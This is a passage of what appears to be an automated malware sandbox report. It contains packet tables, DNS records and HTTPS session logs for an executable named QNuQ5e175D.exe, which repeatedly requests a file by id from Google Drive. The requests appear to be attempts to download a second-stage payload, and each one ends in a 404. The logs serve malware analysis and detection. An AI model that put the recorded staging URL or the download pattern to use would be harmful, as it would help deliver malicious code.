                                                      Jan 11, 2025 05:07:27.497278929 CET50056443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:27.497523069 CET50056443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:27.497543097 CET44350056172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:27.526721001 CET50057443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:27.526786089 CET44350057142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:27.526900053 CET50057443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:27.527153015 CET50057443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:27.527168036 CET44350057142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:28.183888912 CET44350057142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:28.184058905 CET50057443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:28.226393938 CET50057443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:28.226423025 CET44350057142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:28.226622105 CET50057443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:28.226629972 CET44350057142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:28.609543085 CET44350057142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:28.609606981 CET44350057142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:28.609617949 CET50057443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:28.609639883 CET44350057142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:28.609658957 CET50057443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:28.609699965 CET50057443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:28.609699965 CET44350057142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:28.609745979 CET50057443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:28.610491037 CET50057443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:28.610508919 CET44350057142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:28.725166082 CET50058443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:28.725209951 CET44350058172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:28.725267887 CET50058443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:28.725682974 CET50058443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:28.725697041 CET44350058172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:29.371213913 CET44350058172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:29.371296883 CET50058443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:29.371896982 CET50058443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:29.371910095 CET44350058172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:29.372088909 CET50058443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:29.372095108 CET44350058172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:29.755139112 CET44350058172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:29.755244017 CET50058443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:29.755548954 CET50058443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:29.755637884 CET44350058172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:29.755695105 CET50058443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:29.762696981 CET50059443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:29.762789011 CET44350059142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:29.762902021 CET50059443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:29.763293982 CET50059443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:29.763326883 CET44350059142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:30.408684015 CET44350059142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:30.410201073 CET50059443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:30.410634995 CET50059443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:30.410649061 CET44350059142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:30.410801888 CET50059443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:30.410810947 CET44350059142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:30.828221083 CET44350059142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:30.828305006 CET44350059142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:30.828377962 CET44350059142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:30.828380108 CET50059443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:30.828444004 CET50059443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:30.839507103 CET50059443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:30.839545965 CET44350059142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:31.070317984 CET50060443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:31.070358038 CET44350060172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:31.070465088 CET50060443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:31.194961071 CET50060443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:31.194998980 CET44350060172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:31.824943066 CET44350060172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:31.825037003 CET50060443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:31.825681925 CET44350060172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:31.825747013 CET50060443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:31.828835011 CET50060443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:31.828850985 CET44350060172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:31.829116106 CET44350060172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:31.829170942 CET50060443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:31.829833031 CET50060443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:31.871330976 CET44350060172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:32.208215952 CET44350060172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:32.208334923 CET50060443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:32.208375931 CET44350060172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:32.208445072 CET50060443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:32.208729029 CET50060443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:32.208781004 CET44350060172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:32.208847046 CET50060443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:32.209552050 CET50061443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:32.209594011 CET44350061142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:32.209659100 CET50061443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:32.210002899 CET50061443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:32.210016966 CET44350061142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:32.842715979 CET44350061142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:32.842828989 CET50061443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:32.843318939 CET50061443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:32.843329906 CET44350061142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:32.843477964 CET50061443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:32.843482971 CET44350061142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:33.267251015 CET44350061142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:33.267328024 CET44350061142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:33.267391920 CET44350061142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:33.267410040 CET50061443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:33.267450094 CET50061443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:33.267956018 CET50061443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:33.267976999 CET44350061142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:33.381485939 CET50062443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:33.381551981 CET44350062172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:33.381766081 CET50062443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:33.381926060 CET50062443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:33.381947041 CET44350062172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:34.010660887 CET44350062172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:34.010858059 CET50062443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:34.011406898 CET44350062172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:34.011498928 CET50062443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:34.013282061 CET50062443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:34.013293028 CET44350062172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:34.013628006 CET44350062172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:34.013700008 CET50062443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:34.014118910 CET50062443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:34.055347919 CET44350062172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:34.395371914 CET44350062172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:34.395617008 CET50062443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:34.395802975 CET50062443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:34.395812035 CET44350062172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:34.395888090 CET50062443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:34.396629095 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:34.396678925 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:34.396740913 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:34.396953106 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:34.396967888 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.060009003 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.060306072 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.060724974 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.060755014 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.060897112 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.060909986 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.484339952 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.484442949 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.484517097 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.484555006 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.484582901 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.484606028 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.484631062 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.484657049 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.484668970 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.484714985 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.484757900 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.484818935 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.485153913 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.485188961 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.605474949 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:35.605520010 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:35.605587959 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:35.606383085 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:35.606400013 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:36.242197037 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:36.242263079 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.242655039 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.242662907 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:36.242824078 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.242830038 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:36.634720087 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:36.635363102 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.635404110 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:36.635456085 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.635464907 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.635618925 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.635679007 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:36.635736942 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.636457920 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:36.636504889 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:36.636574030 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:36.636859894 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:36.636878014 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.270600080 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.270708084 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.271167994 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.271178007 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.271317959 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.271322966 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.684055090 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.684117079 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.684132099 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.684145927 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.684175968 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.684181929 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.684195995 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.684216022 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.684225082 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.684252977 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.684897900 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.684915066 CET44350065142.250.184.225192.168.2.11

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 11, 2025 05:05:59.908541918 CET6343853192.168.2.111.1.1.1
                                                      Jan 11, 2025 05:05:59.916207075 CET53634381.1.1.1192.168.2.11
                                                      Jan 11, 2025 05:06:01.088660002 CET6313653192.168.2.111.1.1.1
                                                      Jan 11, 2025 05:06:01.096187115 CET53631361.1.1.1192.168.2.11

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 11, 2025 05:05:59.908541918 CET192.168.2.111.1.1.10x7ed9Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                      Jan 11, 2025 05:06:01.088660002 CET192.168.2.111.1.1.10xbc44Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 11, 2025 05:05:59.916207075 CET1.1.1.1192.168.2.110x7ed9No error (0)drive.google.com172.217.16.142A (IP address)IN (0x0001)false
                                                      Jan 11, 2025 05:06:01.096187115 CET1.1.1.1192.168.2.110xbc44No error (0)drive.usercontent.google.com142.250.184.225A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • drive.google.com
                                                      • drive.usercontent.google.com

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.1149854172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:00 UTC216OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      2025-01-11 04:06:01 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:00 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-iOdLH1KEpN8KkTv1tip9_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.1149860142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:01 UTC258OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      2025-01-11 04:06:02 UTC2225INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTTdXpZSXlwSiAzrjMhkKapMak9eF3AaveGf_RYft8RZNr2coBwVTLIJw74yCojNBRL
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:02 GMT
                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-DeDfnxsw2JoCIImyO2KlWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Set-Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ; expires=Sun, 13-Jul-2025 04:06:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:02 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 6c 31 58 6e 76 47 58 4f 71 73 72 58 47 32 74 56 69 75 50 6b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1l1XnvGXOqsrXG2tViuPkw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.1149871172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:03 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:03 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:03 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-a2aXiHs4L7uSZ_1aouDpEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.1149881142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:04 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:04 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQ7Oj6XiMKPrNThbbNvGLq5Ji9066ekkRbzA-wvmisqifUl2t9TUFrdvfYOw4MHfun1
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:04 GMT
